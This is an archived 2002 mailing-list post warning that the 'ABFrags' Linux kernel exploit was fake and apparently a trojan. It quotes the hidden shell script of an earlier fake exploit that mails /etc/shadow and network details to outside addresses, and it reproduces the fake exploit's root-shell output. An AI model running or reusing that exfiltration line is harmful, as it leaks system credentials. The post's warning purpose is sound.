Read that related news: <quote> A message posted on the Security Mailing list BugTraq about an exploit for Linux kernels "ABFrags" has turned out to be a fake. Rumors about "abfrags.c", that would use a security hole in the TCP/IP stack, have been spreading for week on the chat network efnet, although at that time it was supposed to be an a exploit for Free BSD kernels. </quote> link: http://www.heise.de/english/newsticker/data/jk-18.10.02-006/ Previously there have been a binary out by the name "syncthis", which looked somewhat same, but actually use to run this behind: #!/bin/sh (/sbin/ifconfig;cat /etc/shadow; cat) | /bin/mail -s $HOSTNAME b4shb0yat_private -c B1tchat_private >/dev/null 2>/dev/null It claimed to be a Linux tcp stack exploit. McKenzy Wihle GSH security - 9/01/02: Remote kernel tcp packet sync bug. Check GSH main dir for whitepaper. This bug does not leave GSH labs until further notice. update: 9/03/02 - got response from George Weenste, NSA coordinated fix release and vulnerability disclosure to come in December 2002 linux kernel developers warned --- WARNING: Will not fail on most errors, read whitepaper for proper use. --- READ WHITEPAPER! - no args It's password was "nsasucks" Has anyone tried that on the abfrag binary? ABfrag posers are pasting this on irc sessions to initiate trades, and eventually get access to your host. server@thebox:~$ ./ABfrag.bin -d 192.168.1.20 ---------------------------------------------------------------------------- ABfrag - Linux Kernel ( <= 2.4.20pre20 ) Remote Syncing Exploit Found and coded by Ac1db1tch3z - t3kn10n, n0n3 and t3kn0h03. WARNING: Unlicensed usage and/or distribution of this program carries heavy fines and penalties under American, British, European and International copyright law. Should you find this program on any compromised system we urge you to delete this binary rather than attempt distribution or analysis. Such actions would be both unlawful and unwise. ---------------------------------------------------------------------------- password: * Finding local offsets (for sync with remote kernel). * Finding remote time intervals...567ms per packet * repairing LKM source into shellcode * Obtained socket for connect back -- Sending Racer PACKET complete! -- .............................................CONNECT BACK FAILED! FIXING! Fixed timing at 0x8453fffe bash# id uid=0(root) gid=0(root) groups=11(httpd) bash# w 6:01pm up 12 days, 17:06, 0 users, load average: 0.34, .26, 0.20 I think probably the person who cracked Mr Daniel, might have uploaded this trojan later on to try his box as a launch pad to attack more hosts/ to just try out this exploit too for the heck of it. Does Mr daniel have any snort dumps, while the attack occurred? Regards -------- Muhammad Faisal Rauf Danka Head of GemSEC / Chief Technology Officer Gem Internet Services (Pvt) Ltd. web: www.gem.net.pk Key Id: 0x784B0202 Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B 784B 0202 _____________________________________________________________ --------------------------- [ATTITUDEX.COM] http://www.attitudex.com/ --------------------------- _____________________________________________________________ Select your own custom email address for FREE! Get youat_private w/No Ads, 6MB, POP & more! http://www.everyone.net/selectmail?campaign=tag
This archive was generated by hypermail 2b30 : Sat Oct 19 2002 - 15:02:31 PDT